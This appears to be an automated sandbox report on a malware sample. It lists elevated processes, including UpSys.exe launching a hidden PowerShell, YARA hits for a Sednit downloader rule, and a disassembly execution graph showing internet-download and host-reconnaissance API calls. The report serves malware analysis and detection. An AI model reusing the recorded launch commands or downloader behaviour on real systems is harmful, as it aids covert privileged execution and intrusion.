                                                                                                                                                            Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                            File size:945944 bytes
                                                                                                                                                            MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000045.00000003.430480390.00000000030E1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000045.00000002.435209850.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth

                                                                                                                                                            General

                                                                                                                                                            Target ID:70
                                                                                                                                                            Start time:09:52:18
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\ProgramData\UpSys.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                            File size:945944 bytes
                                                                                                                                                            MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000046.00000003.440830795.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000046.00000002.444541344.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth

                                                                                                                                                            General

                                                                                                                                                            Target ID:71
                                                                                                                                                            Start time:09:52:24
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                            Imagebase:0x7ff6ba650000
                                                                                                                                                            File size:447488 bytes
                                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            General

                                                                                                                                                            Target ID:72
                                                                                                                                                            Start time:09:52:25
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:73
                                                                                                                                                            Start time:09:52:31
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:76
                                                                                                                                                            Start time:09:52:49
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                            Imagebase:0x7ff678970000
                                                                                                                                                            File size:455656 bytes
                                                                                                                                                            MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:77
                                                                                                                                                            Start time:09:52:49
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:81
                                                                                                                                                            Start time:09:53:09
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:83
                                                                                                                                                            Start time:09:53:38
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:86
                                                                                                                                                            Start time:09:53:53
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Disassembly

                                                                                                                                                            Reset < >

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:11%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:7.6%
                                                                                                                                                              Total number of Nodes:1434
                                                                                                                                                              Total number of Limit Nodes:78
                                                                                                                                                              execution_graph 25339 7ff7191b7100 25340 7ff7191b7138 25339->25340 25378 7ff7191ba820 25340->25378 25342 7ff7191b7165 25392 7ff7191d09d4 25342->25392 25344 7ff7191b7615 25450 7ff7191b3a80 70 API calls _com_raise_error 25344->25450 25346 7ff7191b71f3 25351 7ff7191ba820 32 API calls 25346->25351 25370 7ff7191b7247 25346->25370 25348 7ff7191b7627 25353 7ff7191b3a80 70 API calls 25348->25353 25349 7ff7191b7610 25445 7ff7191da5f8 25349->25445 25354 7ff7191b7282 25351->25354 25356 7ff7191b763b 25353->25356 25432 7ff7191bb4d0 25354->25432 25359 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25356->25359 25358 7ff7191b72a1 25358->25348 25360 7ff7191b72a9 25358->25360 25361 7ff7191b7641 25359->25361 25360->25356 25376 7ff7191b72e6 25360->25376 25362 7ff7191b3a80 70 API calls 25361->25362 25363 7ff7191b7656 25362->25363 25364 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25363->25364 25365 7ff7191b765b 25364->25365 25367 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25365->25367 25366 7ff7191b9c50 32 API calls 25366->25376 25368 7ff7191b7661 25367->25368 25371 7ff7191b3990 69 API calls 25368->25371 25369 7ff7191d09d4 51 API calls 25369->25376 25436 7ff7191d23b0 25370->25436 25372 7ff7191b7669 25371->25372 25373 7ff7191bb240 68 API calls 25372->25373 25374 7ff7191b7685 25373->25374 25375 7ff7191b3ea0 FindNextFileW GetLastError 25375->25376 25376->25361 25376->25363 25376->25365 25376->25366 25376->25368 25376->25369 25376->25370 25376->25375 25377 7ff7191bb8a0 32 API calls 25376->25377 25377->25376 25381 7ff7191ba87a 25378->25381 25383 7ff7191ba841 ctype 25378->25383 25379 7ff7191ba990 25461 7ff7191b1300 32 API calls __std_exception_copy 25379->25461 25381->25379 25382 7ff7191ba98a 25381->25382 25385 7ff7191ba915 25381->25385 25386 7ff7191ba8ed 25381->25386 25460 7ff7191b1260 32 API calls 3 library calls 25382->25460 25383->25342 25384 7ff7191ba996 25389 7ff7191d23d8 std::_Facet_Register 32 API calls 25385->25389 25390 7ff7191ba902 ctype 25385->25390 25386->25382 25451 7ff7191d23d8 25386->25451 25389->25390 25391 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25390->25391 25391->25382 25393 7ff7191d0a0b 25392->25393 25394 7ff7191d0a14 25393->25394 25395 7ff7191d0ab6 25393->25395 25398 7ff7191d0a64 GetFileAttributesExW 25393->25398 25396 7ff7191d23b0 _handle_error 8 API calls 25394->25396 25465 7ff7191d0c70 CreateFileW GetLastError 25395->25465 25399 7ff7191b718e 25396->25399 25401 7ff7191d0a82 25398->25401 25402 7ff7191d0a77 GetLastError 25398->25402 25399->25344 25399->25346 25399->25349 25400 7ff7191d0ad8 25403 7ff7191d0afd 25400->25403 25404 7ff7191d0ade 25400->25404 25401->25394 25401->25395 25402->25394 25406 7ff7191d0b4b 25403->25406 25408 7ff7191d0b0c GetFileInformationByHandleEx 25403->25408 25405 7ff7191d0ae8 CloseHandle 25404->25405 25423 7ff7191d0af6 25404->25423 25407 7ff7191d0c55 25405->25407 25405->25423 25409 7ff7191d0b61 GetFileInformationByHandleEx 25406->25409 25410 7ff7191d0b9d 25406->25410 25466 7ff7191de0c0 35 API calls 3 library calls 25407->25466 25408->25406 25414 7ff7191d0b25 GetLastError 25408->25414 25409->25410 25415 7ff7191d0b7c GetLastError 25409->25415 25412 7ff7191d0bf0 25410->25412 25413 7ff7191d0bb7 GetFileInformationByHandleEx 25410->25413 25418 7ff7191d0c05 25412->25418 25419 7ff7191d0c3b 25412->25419 25413->25412 25417 7ff7191d0bcc GetLastError 25413->25417 25420 7ff7191d0b33 CloseHandle 25414->25420 25414->25423 25421 7ff7191d0b8a CloseHandle 25415->25421 25415->25423 25416 7ff7191d0c5a 25467 7ff7191de0c0 35 API calls 3 library calls 25416->25467 25417->25423 25424 7ff7191d0bde CloseHandle 25417->25424 25418->25394 25425 7ff7191d0c0b CloseHandle 25418->25425 25422 7ff7191d0c41 CloseHandle 25419->25422 25419->25423 25420->25423 25426 7ff7191d0c66 25420->25426 25421->25416 25421->25423 25422->25407 25422->25423 25423->25394 25424->25423 25428 7ff7191d0c60 25424->25428 25425->25394 25425->25407 25469 7ff7191de0c0 35 API calls 3 library calls 25426->25469 25468 7ff7191de0c0 35 API calls 3 library calls 25428->25468 25431 7ff7191d0c6c 25470 7ff7191b9c50 25432->25470 25434 7ff7191bb50f 25482 7ff7191b3b50 25434->25482 25437 7ff7191d23b9 25436->25437 25438 7ff7191b75f7 25437->25438 25439 7ff7191d2a3c IsProcessorFeaturePresent 25437->25439 25440 7ff7191d2a54 25439->25440 25532 7ff7191d2c30 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25440->25532 25442 7ff7191d2a67 25533 7ff7191d2a08 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25442->25533 25534 7ff7191da528 30 API calls 2 library calls 25445->25534 25447 7ff7191da611 25535 7ff7191da628 IsProcessorFeaturePresent 25447->25535 25452 7ff7191d23e3 25451->25452 25453 7ff7191d23fc 25452->25453 25455 7ff7191d2402 25452->25455 25462 7ff7191e1868 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 25452->25462 25453->25390 25458 7ff7191d240d 25455->25458 25463 7ff7191d0f1c RtlPcToFileHeader _purecall _com_raise_error std::bad_alloc::bad_alloc 25455->25463 25464 7ff7191b1260 32 API calls 3 library calls 25458->25464 25459 7ff7191d2413 25460->25379 25461->25384 25462->25452 25464->25459 25465->25400 25466->25416 25467->25428 25468->25426 25469->25431 25471 7ff7191b9c7d 25470->25471 25472 7ff7191b9d3b 25471->25472 25474 7ff7191b9ccf 25471->25474 25475 7ff7191b9cf6 25471->25475 25476 7ff7191b9c8b ctype 25471->25476 25496 7ff7191b1260 32 API calls 3 library calls 25472->25496 25474->25472 25479 7ff7191d23d8 std::_Facet_Register 32 API calls 25474->25479 25475->25476 25478 7ff7191d23d8 std::_Facet_Register 32 API calls 25475->25478 25476->25434 25477 7ff7191b9d41 25478->25476 25480 7ff7191b9ce0 25479->25480 25480->25476 25481 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25480->25481 25481->25472 25483 7ff7191b3b6d 25482->25483 25484 7ff7191ba820 32 API calls 25483->25484 25493 7ff7191b3c6b 25483->25493 25485 7ff7191b3bcc 25484->25485 25497 7ff7191b2f20 25485->25497 25487 7ff7191b3bda 25488 7ff7191b3c18 25487->25488 25490 7ff7191b3ca6 25487->25490 25514 7ff7191d092c 25488->25514 25491 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25490->25491 25492 7ff7191b3cab 25491->25492 25495 7ff7191b3c35 25495->25493 25525 7ff7191d08ec FindNextFileW 25495->25525 25496->25477 25498 7ff7191b2f3b 25497->25498 25499 7ff7191b3066 25498->25499 25501 7ff7191b2fac 25498->25501 25500 7ff7191ba820 32 API calls 25499->25500 25507 7ff7191b308b ctype 25499->25507 25500->25507 25502 7ff7191b30bf 25501->25502 25506 7ff7191b304c 25501->25506 25503 7ff7191b30fc 25502->25503 25504 7ff7191b30d7 25502->25504 25508 7ff7191b30e6 25503->25508 25528 7ff7191bc2a0 32 API calls 4 library calls 25503->25528 25505 7ff7191b31d3 25504->25505 25504->25508 25530 7ff7191bb0e0 32 API calls 25505->25530 25506->25507 25510 7ff7191ba820 32 API calls 25506->25510 25507->25487 25508->25507 25529 7ff7191bc440 32 API calls 4 library calls 25508->25529 25510->25507 25515 7ff7191d0957 FindFirstFileExW 25514->25515 25516 7ff7191d094a FindClose 25514->25516 25518 7ff7191d09bb 25515->25518 25519 7ff7191d097e GetLastError 25515->25519 25516->25515 25517 7ff7191d09cd 25516->25517 25531 7ff7191de0c0 35 API calls 3 library calls 25517->25531 25518->25495 25521 7ff7191d098e FindFirstFileExW 25519->25521 25522 7ff7191d0989 25519->25522 25521->25518 25524 7ff7191d09b3 GetLastError 25521->25524 25522->25518 25522->25521 25523 7ff7191d09d2 25524->25518 25526 7ff7191d0901 GetLastError 25525->25526 25527 7ff7191d08fa 25525->25527 25527->25495 25528->25508 25529->25507 25531->25523 25532->25442 25534->25447 25536 7ff7191da63b 25535->25536 25539 7ff7191da3c4 14 API calls 3 library calls 25536->25539 25538 7ff7191da656 GetCurrentProcess TerminateProcess 25539->25538 25540 7ff7191c8540 25542 7ff7191c855a 25540->25542 25541 7ff7191c85c4 25542->25541 25543 7ff7191c8586 SetFilePointer 25542->25543 25543->25541 25544 7ff7191c85a4 GetLastError 25543->25544 25544->25541 25545 7ff7191c85ae GetLastError 25544->25545 25546 7ff7191c85e0 25547 7ff7191c865e 25546->25547 25548 7ff7191c85ee 25546->25548 25548->25547 25549 7ff7191c85f6 SetFilePointer 25548->25549 25550 7ff7191c8642 25549->25550 25551 7ff7191c861d GetLastError 25549->25551 25551->25550 25552 7ff7191c8627 GetLastError 25551->25552 25553 7ff7191eaea0 25554 7ff7191eb088 25553->25554 25556 7ff7191eaee3 _isindst 25553->25556 25599 7ff7191dc854 13 API calls _set_errno_from_matherr 25554->25599 25556->25554 25559 7ff7191eaf5f _isindst 25556->25559 25557 7ff7191d23b0 _handle_error 8 API calls 25558 7ff7191eb0a3 25557->25558 25574 7ff7191ed8fc 25559->25574 25564 7ff7191eb0b4 25566 7ff7191da628 _invalid_parameter_noinfo_noreturn 17 API calls 25564->25566 25568 7ff7191eb0c8 25566->25568 25571 7ff7191eafbc 25573 7ff7191eb07a 25571->25573 25598 7ff7191ed93c 30 API calls _isindst 25571->25598 25573->25557 25575 7ff7191ed90a 25574->25575 25576 7ff7191eaf7d 25574->25576 25600 7ff7191de128 EnterCriticalSection 25575->25600 25580 7ff7191ecec8 25576->25580 25578 7ff7191ed912 25578->25576 25579 7ff7191ed7f4 49 API calls 25578->25579 25579->25576 25581 7ff7191eced1 25580->25581 25582 7ff7191eaf92 25580->25582 25601 7ff7191dc854 13 API calls _set_errno_from_matherr 25581->25601 25582->25564 25586 7ff7191ecef8 25582->25586 25584 7ff7191eced6 25602 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 25584->25602 25587 7ff7191ecf01 25586->25587 25588 7ff7191eafa3 25586->25588 25603 7ff7191dc854 13 API calls _set_errno_from_matherr 25587->25603 25588->25564 25592 7ff7191ecf28 25588->25592 25590 7ff7191ecf06 25604 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 25590->25604 25593 7ff7191ecf31 25592->25593 25597 7ff7191eafb4 25592->25597 25605 7ff7191dc854 13 API calls _set_errno_from_matherr 25593->25605 25595 7ff7191ecf36 25606 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 25595->25606 25597->25564 25597->25571 25598->25573 25599->25573 25601->25584 25602->25582 25603->25590 25604->25588 25605->25595 25606->25597 25607 7ff7191d277c 25630 7ff7191d2450 25607->25630 25610 7ff7191d28d3 25651 7ff7191d2f58 7 API calls 2 library calls 25610->25651 25611 7ff7191d279d __scrt_acquire_startup_lock 25613 7ff7191d28dd 25611->25613 25615 7ff7191d27bb 25611->25615 25652 7ff7191d2f58 7 API calls 2 library calls 25613->25652 25616 7ff7191d27e0 25615->25616 25621 7ff7191d27fd __scrt_release_startup_lock 25615->25621 25638 7ff7191e2a78 25615->25638 25617 7ff7191d28e8 BuildCatchObjectHelperInternal 25619 7ff7191d2866 25642 7ff7191e241c 25619->25642 25621->25619 25650 7ff7191e1cf0 35 API calls __std_fs_directory_iterator_open 25621->25650 25623 7ff7191d286b 25648 7ff7191be580 25623->25648 25653 7ff7191d2da0 25630->25653 25633 7ff7191d247f 25655 7ff7191e299c 25633->25655 25634 7ff7191d247b 25634->25610 25634->25611 25639 7ff7191e2ac7 25638->25639 25640 7ff7191e2aad 25638->25640 25639->25621 25640->25639 25672 7ff7191d2760 25640->25672 25643 7ff7191e242c 25642->25643 25646 7ff7191e2441 25642->25646 25643->25646 25681 7ff7191e20e4 45 API calls Concurrency::details::SchedulerProxy::DeleteThis 25643->25681 25645 7ff7191e244a 25645->25646 25682 7ff7191e229c 14 API calls 3 library calls 25645->25682 25646->25623 25683 7ff7191beeb0 25648->25683 25650->25619 25651->25613 25652->25617 25654 7ff7191d2472 __scrt_dllmain_crt_thread_attach 25653->25654 25654->25633 25654->25634 25656 7ff7191ef298 25655->25656 25657 7ff7191d2484 25656->25657 25660 7ff7191e560c 25656->25660 25657->25634 25659 7ff7191d4c88 7 API calls 2 library calls 25657->25659 25659->25634 25671 7ff7191de128 EnterCriticalSection 25660->25671 25662 7ff7191e561c 25663 7ff7191eaa74 31 API calls 25662->25663 25664 7ff7191e5625 25663->25664 25665 7ff7191e5410 33 API calls 25664->25665 25670 7ff7191e5633 25664->25670 25667 7ff7191e562e 25665->25667 25666 7ff7191de17c _isindst LeaveCriticalSection 25668 7ff7191e563f 25666->25668 25669 7ff7191e5500 GetStdHandle GetFileType 25667->25669 25668->25656 25669->25670 25670->25666 25680 7ff7191d3100 SetUnhandledExceptionFilter 25672->25680 25681->25645 25682->25646 25684 7ff7191beef2 25683->25684 25746 7ff7191ba9a0 25684->25746 25686 7ff7191bef30 25762 7ff7191bdd20 InternetOpenA 25686->25762 25691 7ff7191bf09d 25693 7ff7191ba9a0 32 API calls 25691->25693 25694 7ff7191bf0df 25693->25694 25696 7ff7191ba9a0 32 API calls 25694->25696 25695 7ff7191bf01a 25695->25695 25698 7ff7191ba9a0 32 API calls 25695->25698 25697 7ff7191bf10f 25696->25697 25700 7ff7191bf132 ctype 25697->25700 25829 7ff7191bfa10 32 API calls 4 library calls 25697->25829 25698->25691 25796 7ff7191bab00 25700->25796 25702 7ff7191bf20b 25801 7ff7191bf820 25702->25801 25704 7ff7191bf23a 25705 7ff7191bab00 32 API calls 25704->25705 25706 7ff7191bf251 25705->25706 25707 7ff7191bf820 32 API calls 25706->25707 25716 7ff7191bf281 25707->25716 25708 7ff7191bf673 25710 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25708->25710 25709 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25709->25708 25711 7ff7191bf679 25710->25711 25713 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25711->25713 25712 7ff7191bf67f 25714 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25712->25714 25713->25712 25715 7ff7191bf685 25714->25715 25717 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25715->25717 25716->25708 25716->25711 25716->25712 25716->25715 25718 7ff7191bf68b 25716->25718 25719 7ff7191bf691 25716->25719 25720 7ff7191bf4f1 25716->25720 25721 7ff7191bf4c5 25716->25721 25726 7ff7191bf48d ctype 25716->25726 25745 7ff7191bf66d 25716->25745 25717->25718 25722 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25718->25722 25725 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25719->25725 25720->25726 25730 7ff7191d23d8 std::_Facet_Register 32 API calls 25720->25730 25724 7ff7191bf697 25721->25724 25728 7ff7191d23d8 std::_Facet_Register 32 API calls 25721->25728 25722->25719 25830 7ff7191b1260 32 API calls 3 library calls 25724->25830 25725->25724 25735 7ff7191bf6a3 25726->25735 25815 7ff7191b9e00 25726->25815 25727 7ff7191bf531 25731 7ff7191bdd20 38 API calls 25727->25731 25728->25726 25730->25726 25741 7ff7191bf53f 25731->25741 25732 7ff7191bf69d 25734 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25732->25734 25733 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25736 7ff7191bf6a9 25733->25736 25734->25735 25735->25733 25737 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25736->25737 25738 7ff7191bf6af 25737->25738 25739 7ff7191bf633 25740 7ff7191d23b0 _handle_error 8 API calls 25739->25740 25742 7ff7191bf647 25740->25742 25741->25732 25741->25735 25741->25736 25741->25739 25743 7ff7191bf668 25741->25743 25744 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25743->25744 25744->25745 25745->25709 25749 7ff7191ba9be ctype 25746->25749 25751 7ff7191ba9ea 25746->25751 25747 7ff7191baaf5 25832 7ff7191b1300 32 API calls __std_exception_copy 25747->25832 25749->25686 25750 7ff7191baafb 25751->25747 25752 7ff7191baa74 25751->25752 25753 7ff7191baa48 25751->25753 25757 7ff7191d23d8 std::_Facet_Register 32 API calls 25752->25757 25760 7ff7191baa5d ctype 25752->25760 25754 7ff7191baa55 25753->25754 25755 7ff7191baaea 25753->25755 25758 7ff7191d23d8 std::_Facet_Register 32 API calls 25754->25758 25831 7ff7191b1260 32 API calls 3 library calls 25755->25831 25757->25760 25758->25760 25759 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25759->25747 25760->25759 25761 7ff7191baacb 25760->25761 25761->25686 25763 7ff7191bde0f InternetOpenUrlA 25762->25763 25774 7ff7191bdd86 25762->25774 25767 7ff7191bdf6b InternetCloseHandle 25763->25767 25776 7ff7191bde41 memcpy_s ctype 25763->25776 25765 7ff7191bddca 25766 7ff7191d23b0 _handle_error 8 API calls 25765->25766 25768 7ff7191bddf4 25766->25768 25769 7ff7191ba9a0 32 API calls 25767->25769 25781 7ff7191bdfe0 25768->25781 25769->25774 25770 7ff7191bdfba 25771 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25770->25771 25773 7ff7191bdfd7 25771->25773 25772 7ff7191bde70 InternetReadFile 25772->25776 25777 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25773->25777 25774->25765 25774->25770 25776->25767 25776->25772 25779 7ff7191bdf0d InternetCloseHandle InternetCloseHandle 25776->25779 25833 7ff7191bca80 32 API calls 4 library calls 25776->25833 25778 7ff7191bdfdd 25777->25778 25779->25765 25780 7ff7191bdf3e 25779->25780 25780->25765 25780->25767 25780->25773 25834 7ff7191d4a30 25781->25834 25784 7ff7191be02e CoInitializeSecurity 25786 7ff7191be1b6 CoUninitialize 25784->25786 25787 7ff7191be068 CoCreateInstance 25784->25787 25785 7ff7191be1bc 25788 7ff7191d23b0 _handle_error 8 API calls 25785->25788 25786->25785 25787->25786 25789 7ff7191be098 25787->25789 25790 7ff7191be1c8 lstrcpyA GetComputerNameW 25788->25790 25791 7ff7191d23d8 std::_Facet_Register 32 API calls 25789->25791 25790->25691 25790->25695 25792 7ff7191be0b1 25791->25792 25792->25786 25793 7ff7191be558 25792->25793 25794 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25793->25794 25795 7ff7191be573 25794->25795 25797 7ff7191bab62 25796->25797 25800 7ff7191bab23 ctype 25796->25800 25836 7ff7191bca80 32 API calls 4 library calls 25797->25836 25799 7ff7191bab78 25799->25702 25800->25702 25804 7ff7191bf86a 25801->25804 25802 7ff7191bf9fa 25837 7ff7191b1300 32 API calls __std_exception_copy 25802->25837 25804->25802 25806 7ff7191bf992 25804->25806 25807 7ff7191bf96a 25804->25807 25813 7ff7191bf86f ctype 25804->25813 25805 7ff7191bfa00 25838 7ff7191b1260 32 API calls 3 library calls 25805->25838 25808 7ff7191d23d8 std::_Facet_Register 32 API calls 25806->25808 25806->25813 25807->25805 25810 7ff7191d23d8 std::_Facet_Register 32 API calls 25807->25810 25808->25813 25812 7ff7191bf97f 25810->25812 25811 7ff7191bfa06 25812->25813 25814 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25812->25814 25813->25704 25814->25802 25816 7ff7191b9e2d 25815->25816 25817 7ff7191b9e94 25816->25817 25818 7ff7191b9e6d 25816->25818 25820 7ff7191b9e3b ctype 25816->25820 25817->25820 25823 7ff7191d23d8 std::_Facet_Register 32 API calls 25817->25823 25819 7ff7191b9ed5 25818->25819 25822 7ff7191d23d8 std::_Facet_Register 32 API calls 25818->25822 25839 7ff7191b1260 32 API calls 3 library calls 25819->25839 25820->25727 25825 7ff7191b9e7e 25822->25825 25823->25820 25824 7ff7191b9edb 25840 7ff7191b81b0 67 API calls 25824->25840 25825->25820 25827 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25825->25827 25827->25819 25828 7ff7191b9ef4 25828->25727 25829->25700 25830->25732 25831->25760 25832->25750 25833->25776 25835 7ff7191be01c CoInitializeEx 25834->25835 25835->25784 25835->25785 25836->25799 25837->25805 25838->25811 25839->25824 25840->25828 25841 7ff7191d15d8 25842 7ff7191d163e 25841->25842 25843 7ff7191d1680 25842->25843 25845 7ff7191dd4e8 92 API calls 25842->25845 25846 7ff7191d168d 25842->25846 25847 7ff7191d1685 25843->25847 25849 7ff7191dd4e8 25843->25849 25845->25843 25847->25846 25868 7ff7191d8d14 64 API calls 3 library calls 25847->25868 25850 7ff7191dd42c 25849->25850 25851 7ff7191dd449 25850->25851 25853 7ff7191dd475 25850->25853 25881 7ff7191dc854 13 API calls _set_errno_from_matherr 25851->25881 25855 7ff7191dd487 25853->25855 25856 7ff7191dd47a 25853->25856 25854 7ff7191dd44e 25882 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 25854->25882 25869 7ff7191e6d40 25855->25869 25883 7ff7191dc854 13 API calls _set_errno_from_matherr 25856->25883 25861 7ff7191dd49b 25884 7ff7191dc854 13 API calls _set_errno_from_matherr 25861->25884 25862 7ff7191dd4a8 25876 7ff7191eb570 25862->25876 25865 7ff7191dd4bc 25885 7ff7191d9770 LeaveCriticalSection 25865->25885 25867 7ff7191dd459 25867->25847 25868->25846 25886 7ff7191de128 EnterCriticalSection 25869->25886 25871 7ff7191e6d57 25872 7ff7191e6db4 16 API calls 25871->25872 25873 7ff7191e6d62 25872->25873 25874 7ff7191de17c _isindst LeaveCriticalSection 25873->25874 25875 7ff7191dd491 25874->25875 25875->25861 25875->25862 25887 7ff7191eb2ac 25876->25887 25879 7ff7191eb5ca 25879->25865 25881->25854 25882->25867 25883->25867 25884->25867 25892 7ff7191eb2d6 25887->25892 25889 7ff7191eb54f 25906 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 25889->25906 25891 7ff7191eb492 25891->25879 